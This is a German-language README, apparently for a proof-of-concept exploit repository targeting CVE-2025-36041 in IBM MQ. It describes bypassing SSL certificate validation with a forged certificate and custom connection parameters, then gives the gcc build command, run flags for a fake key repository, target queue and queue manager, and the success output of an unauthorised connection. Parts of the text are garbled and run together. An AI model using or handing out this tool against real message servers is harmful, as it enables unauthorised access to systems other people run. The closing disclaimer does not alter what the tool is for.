
Exploit (C) der Schwachstelle CVE-2025-36041 in IBM MQ
Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für CVE-2025-36041, eine Sicherheitslücke in IBM MQ (Message Queue), die es ermöglicht, die SSL-Zertifikatsprüfung zu umgehen. Durch das Injizieren eines gefälschten SSL-Zertifikats und die Verwendung angepasster MQCONNX-Parameter kann eine nicht autorisierte Client-Verbindung zu einem IBM MQ-Server hergestellt werden.
"Hello MQ"), um die erfolgreiche Ausnutzung zu bestätigen.Stellen Sie sicher, dass die IBM MQ-Clientbibliotheken installiert sind und die Umgebungsvariablen (MQ_INCLUDE_PATH, ) entsprechend gesetzt sind.
MQ_LIB_PATHgcc exploit.c argparse.c -o CVE-2025-36041
-I/path/to/mqm/include
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041
-p /path/to/fake/ssl
-n TARGET.QUEUE.NAME
-m QM1
Parameter:
-p, --path Pfad zum Verzeichnis des gefälschten SSL KeyRepository.-n, --name Name der Ziel-Queue, die geöffnet werden soll und an die die Nachricht gesendet wird.-m, --qmgr Name des Queue-Managers../CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
Bei Erfolg sehen Sie:
[+] Verbindung zu IBM MQ wird hergestellt... [+] Erfolgreich mit gefälschtem SSL verbunden! [+] Nachricht erfolgreich gesendet!
Nur für autorisierte Penetrationstests und zu Bildungszwecken. Die unbefugte Nutzung dieses PoC kann gegen lokale Gesetze und Vorschriften verstoßen. Der Autor übernimmt keine Haftung für Missbrauch.
Autor: Byte Reaper CVE: CVE-2025-36041